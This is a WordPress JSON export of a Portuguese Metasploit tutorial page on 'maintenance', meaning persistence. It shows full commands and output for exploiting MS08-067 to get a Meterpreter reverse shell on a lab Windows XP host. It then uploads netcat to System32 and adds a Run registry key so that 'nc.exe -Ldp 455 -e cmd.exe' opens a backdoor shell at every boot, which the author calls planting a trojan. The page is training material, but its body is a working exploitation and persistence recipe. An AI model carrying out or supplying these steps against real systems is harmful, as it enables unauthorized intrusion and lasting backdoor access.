{"id":5110,"date":"2012-09-11T15:44:23","date_gmt":"2012-09-11T18:44:23","guid":{"rendered":"http:\/\/www.ethicalhacker.com.br\/site\/?page_id=5110"},"modified":"2012-09-11T16:01:44","modified_gmt":"2012-09-11T19:01:44","slug":"manutencao","status":"publish","type":"page","link":"https:\/\/www.ethicalhacker.com.br\/site\/manutencao\/","title":{"rendered":"Manuten\u00e7\u00e3o"},"content":{"rendered":"<p>Nessa parte do mini curso Metasploit, mostraremos como plantar um cavalo de tr\u00f3ia e garantir o retorno. Essa fase do ataque tamb\u00e9m \u00e9 conhecida como manuten\u00e7\u00e3o:<\/p>\n<p>1\u00ba) Passo: Ganhar acesso ao alvo <\/p>\n<pre lang=\"shell\" prompt=\"#\">msf > use exploit\/windows\/smb\/ms08_067_netapi\r\nmsf  exploit(ms08_067_netapi) > set RHOST 192.168.1.107\r\nRHOST => 192.168.1.107\r\nmsf  exploit(ms08_067_netapi) > set LHOST 192.168.1.110\r\nLHOST => 192.168.1.110\r\nmsf  exploit(ms08_067_netapi) > set payload windows\/meterpreter\/reverse_tcp\r\npayload => windows\/meterpreter\/reverse_tcp\r\nmsf  exploit(ms08_067_netapi) > exploit\r\n\r\n[*] Started reverse handler on 192.168.1.110:4444\r\n[*] Automatically detecting the target...\r\n[*] Fingerprint: Windows XP - Service Pack 3 - lang:English\r\n[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)\r\n[*] Attempting to trigger the vulnerability...\r\n[*] Sending stage (752128 bytes) to 192.168.1.107\r\n[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.107:1118) at 2012-08-20 17:15:06 -0300\r\n\r\n<\/pre>\n<p>2\u00ba)Passo:  j\u00e1 no meterpreter vamos fazer o upload do NETCAT para a m\u00e1quina alvo, isto nos garantir\u00e1 uma porta na escuta para futuros retornos.<br \/>\n <\/p>\n<pre lang=\"shell\" prompt=\"#\">meterpreter > lcd \/pentest\/windows-binaries\/tools\r\nmeterpreter > upload nc.exe C:\\\\Windows\\\\System32\r\n[*] uploading  : nc.exe -> C:\\Windows\\System32\r\n[*] uploaded   : nc.exe -> C:\\Windows\\System32\\nc.exe\r\n\r\n<\/pre>\n<p><\/p>\n<p>3\u00ba) Passo, ap\u00f3s subir o NETCAT , vamos enumerar as entradas no registro <\/p>\n<pre lang=\"shell\" prompt=\"#\">meterpreter > reg enumkey -k  HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\nEnumerating: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n  Values (2):\r\n\r\n        VMware Tools\r\n        VMware User Process\r\n\r\n<\/pre>\n<p>\n4\u00ba) Passo: feito isso, vamos ent\u00e3o plantar o NETCAT<br \/>\n<\/p>\n<pre lang=\"shell\" prompt=\"#\">meterpreter > reg setval -k  HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v -nc -d 'C:\\WINDOWS\\System32\\nc.exe -Ldp 455 -e cmd.exe'\r\nSuccessful set -nc.\r\n<\/pre>\n<p>\n5\u00ba) Passo: vamos enumerar novamente e verificar se tivemos sucesso <\/p>\n<pre lang=\"shell\" prompt=\"#\">meterpreter > reg enumkey -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\nEnumerating: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n  Values (3):\r\n\r\n        VMware Tools\r\n        VMware User Process\r\n        -nc\r\n<\/pre>\n<p><\/p>\n<p>6\u00b0)Passo: Note que agora temos o valor -nc , ent\u00e3o executemos o valor <\/p>\n<pre lang=\"shell\" prompt=\"#\">meterpreter > reg queryval  -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v -nc\r\nKey: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: -nc\r\nType: REG_SZ\r\nData: C:\\WINDOWS\\System32\\nc.exe -Ldp 455 -e cmd.exe\r\n<\/pre>\n<p>\nOk !!! agora toda a vez que o alvo iniciar a m\u00e1quina, nosso cavalo de tr\u00f3ia abrir\u00e1 uma porta de conex\u00e3o e poderemos acessar a m\u00e1quina sem problemas.<\/p>\n<p>At\u00e9 o pr\u00f3ximo m\u00f3dulo.<\/p>\n<p><\/p>\n\r\n\t\t<div class='author-shortcodes'>\r\n\t\t\t<div class='author-inner'>\r\n\t\t\t\t<div class='author-image'>\r\n\t\t\t<img src='https:\/\/www.ethicalhacker.com.br\/site\/wp-content\/uploads\/186048_100001838322519_1550894_n-11668_57x57.jpg' alt='' \/>\r\n\t\t\t<div class='author-overlay'><\/div>\r\n\t\t<\/div> <!-- .author-image --> \r\n\t\t<div class='author-info'>\r\n\t\t\t<p>Autor:\u00a0<strong>S\u00edlvio C\u00e9sar Roxo Giavaroto<\/strong><\/p>\n<p>\u00c9 MBA Especialista em Gest\u00e3o de Seguran\u00e7a da Informa\u00e7\u00e3o,\nTecn\u00f3logo em Redes de Computadores, C|EH Certified Ethical Hacker,\natua como Pentest e Analista de Seguran\u00e7a em Servidores Linux no\nGoverno do Estado de S\u00e3o Paulo, Professor Universit\u00e1rio , \u00a0Instrutor\nC|EH e C|HFI.<\/p>\n<p><em>\u00a0<\/em>\r\n\t\t<\/div> <!-- .author-info --><\/p>\r\n\t\t\t<\/div> <!-- .author-inner -->\r\n\t\t<\/div> <!-- .author-shortcodes -->\n","protected":false},"excerpt":{"rendered":"<p>Nessa parte do mini curso Metasploit, mostraremos como plantar um cavalo de tr\u00f3ia e garantir o retorno. Essa fase do ataque tamb\u00e9m \u00e9 conhecida como manuten\u00e7\u00e3o: 1\u00ba) Passo: Ganhar acesso ao alvo msf > use exploit\/windows\/smb\/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107 RHOST => 192.168.1.107 msf exploit(ms08_067_netapi) > set LHOST 192.168.1.110 LHOST => 192.168.1.110 msf [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-5110","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=5110"}],"version-history":[{"count":6,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5110\/revisions"}],"predecessor-version":[{"id":5117,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/pages\/5110\/revisions\/5117"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=5110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}